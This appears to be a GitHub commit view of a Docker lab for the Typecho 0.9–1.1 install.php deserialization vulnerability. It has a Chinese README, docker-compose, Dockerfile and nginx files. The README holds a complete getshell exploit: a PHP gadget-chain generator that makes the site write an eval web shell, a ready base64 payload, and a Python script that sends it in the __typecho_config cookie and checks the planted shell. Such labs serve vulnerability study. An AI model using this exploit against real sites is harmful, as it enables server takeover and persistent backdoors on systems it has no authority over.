-
Notifications
You must be signed in to change notification settings - Fork 64
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
248 changed files
with
42,713 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,89 @@ | ||
| ## 环境构建 | ||
| ``` | ||
| docker-compose build | ||
| docker-compose up -d | ||
| ``` | ||
|
|
||
| tip:系统在部署的时候Typecho/1.0/mysql/schema.sql的'siteUrl',0,'http://10.0.0.211'改成对应的ip地址 | ||
|
|
||
| ## 漏洞介绍 | ||
| typecho的install反序列漏洞,该漏洞影响的版本从0.9版本到1.1 | ||
|
|
||
|
|
||
|
|
||
| getshell payload | ||
| 0x01 首先生成padyload | ||
| ``` | ||
| <?php | ||
| class Typecho_Feed{ | ||
| private $_type = 'ATOM 1.0'; | ||
| private $_charset = 'UTF-8'; | ||
| private $_lang = 'zh'; | ||
| private $_items = array(); | ||
| public function addItem(array $item){ | ||
| $this->_items[] = $item; | ||
| } | ||
| } | ||
| class Typecho_Request{ | ||
| private $_params = array('screenName'=>'file_put_contents(\'luffy.php\', \'<?php @eval($_POST[luffy]);?>\')'); | ||
| private $_filter = array('assert'); | ||
| } | ||
| $payload1 = new Typecho_Feed(); | ||
| $payload2 = new Typecho_Request(); | ||
| $payload1->addItem(array('author' => $payload2)); | ||
| $exp = array('adapter' => $payload1, 'prefix' => 'typecho'); | ||
| echo base64_encode(serialize($exp)); | ||
| ?> | ||
| ``` | ||
|
|
||
| 然后填充内容到exp | ||
| ``` | ||
| # -*- coding:utf-8 -*- | ||
| import requests,re | ||
| from bs4 import BeautifulSoup as bs | ||
| def send(url): | ||
| # exp = 'YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NTp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIyOiIAVHlwZWNob19GZWVkAF92ZXJzaW9uIjtpOjE7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJlbiI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTc6ImZpbGVfcHV0X2NvbnRlbnRzKCdwYXNzLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NDoidGgxcyI7fQ==+JykiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX19fXM6NjoicHJlZml4IjtzOjQ6InRoMXMiO30' | ||
| exp = "YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCdsdWZmeS5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW2x1ZmZ5XSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ==" | ||
| referer = "http://"+url+"/admin" | ||
| cookies = {'__typecho_config':exp} | ||
| params = {"finish":1} | ||
| headers = { | ||
| 'Accept-Language': 'zh-CN,zh;q=0.8', | ||
| 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', | ||
| 'Referer': referer, | ||
| 'Host' : url | ||
| } | ||
| attack_url = "http://" + url + "/install.php" | ||
| exp_url ="http://" + url + "/luffy.php" | ||
| # print(attack_url) | ||
| try: | ||
| response = requests.get(attack_url,params=params,headers=headers,cookies=cookies) | ||
| response2 = requests.get(exp_url,params=params,headers=headers) | ||
| if response2.status_code == 200: | ||
| print("wonderful! url is "+ exp_url + "\n") | ||
| else: | ||
| print("测试失败") | ||
| except Exception as e: | ||
| print(e) | ||
| print("requests error") | ||
| send("127.0.0.1") | ||
| ``` | ||
|  | ||
|
|
||
|
|
||
|
|
||
| ## 漏洞连接 | ||
| [链接一](https://lorexxar.cn/2017/10/26/typecho-getshell/) | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,19 @@ | ||
| version: '2' | ||
| services: | ||
| php5-typehco_1.0: | ||
| build: ./php-fpm | ||
| image: s1r1u5/typecho:1.0 | ||
| restart: always | ||
| links: | ||
| - mysql_typecho_1.0:db | ||
| ports: | ||
| - 80:80 | ||
| depends_on: | ||
| - mysql_typecho_1.0 | ||
|
|
||
| mysql_typecho_1.0: | ||
| build: ./mysql | ||
| image: s1r1u5/mysql_typecho:1.0 | ||
| environment: | ||
| MYSQL_ROOT_PASSWORD: "123456" | ||
|
|
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,11 @@ | ||
| FROM mysql:5.7 | ||
|
|
||
| MAINTAINER s1riu5 <[email protected]> | ||
|
|
||
| ENV AUTO_RUN_DIR /docker-entrypoint-initdb.d | ||
|
|
||
| ENV INSTALL_DB_SQL schema.sql | ||
|
|
||
| COPY ./$INSTALL_DB_SQL $AUTO_RUN_DIR/ | ||
|
|
||
| RUN chmod a+x $AUTO_RUN_DIR/$INSTALL_DB_SQL |
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| FROM s1r1u5/php:5.6 | ||
|
|
||
|
|
||
| MAINTAINER s1riu5<[email protected]> | ||
|
|
||
|
|
||
| COPY default.conf /etc/nginx/conf.d/ | ||
| COPY super.ini /etc/supervisor.d/ | ||
|
|
||
| COPY src/ /app | ||
|
|
||
|
|
||
| RUN set -x \ | ||
| && chmod -R 777 /app \ | ||
| && apk add php5-json php5-mcrypt php5-xml php5-ctype | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,55 @@ | ||
| server { | ||
| listen 80; | ||
| server_name localhost; | ||
|
|
||
| #charset koi8-r; | ||
| access_log /var/log/nginx/host.access.log main; | ||
|
|
||
| location / { | ||
| root /app; | ||
| index index.php index.html index.htm; | ||
| } | ||
|
|
||
| #error_page 404 /404.html; | ||
|
|
||
| # redirect server error pages to the static page /50x.html | ||
| # | ||
| error_page 500 502 503 504 /50x.html; | ||
| location = /50x.html { | ||
| root /app; | ||
| } | ||
|
|
||
| # proxy the PHP scripts to Apache listening on 127.0.0.1:80 | ||
| # | ||
| #location ~ \.php$ { | ||
| # proxy_pass http://127.0.0.1; | ||
| #} | ||
|
|
||
| # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 | ||
| # | ||
| location ~ .*\.php(\/.*)*$ { | ||
| root /app; #站点目录 | ||
| fastcgi_pass 127.0.0.1:9000; | ||
| fastcgi_index index.php; | ||
| fastcgi_param SCRIPT_FILENAME /app$fastcgi_script_name; | ||
| include fastcgi_params; | ||
|
|
||
| set $path_info ""; | ||
| set $real_script_name $fastcgi_script_name; | ||
| if ($fastcgi_script_name ~ "^(.+?\.php)(/.+)$") { | ||
| set $real_script_name $1; | ||
| set $path_info $2; | ||
| } | ||
| fastcgi_param SCRIPT_FILENAME $document_root$real_script_name; | ||
| fastcgi_param SCRIPT_NAME $real_script_name; | ||
| fastcgi_param PATH_INFO $path_info; | ||
| } | ||
|
|
||
|
|
||
| # deny access to .htaccess files, if Apache's document root | ||
| # concurs with nginx's one | ||
| # | ||
| #location ~ /\.ht { | ||
| # deny all; | ||
| #} | ||
| } |
Oops, something went wrong.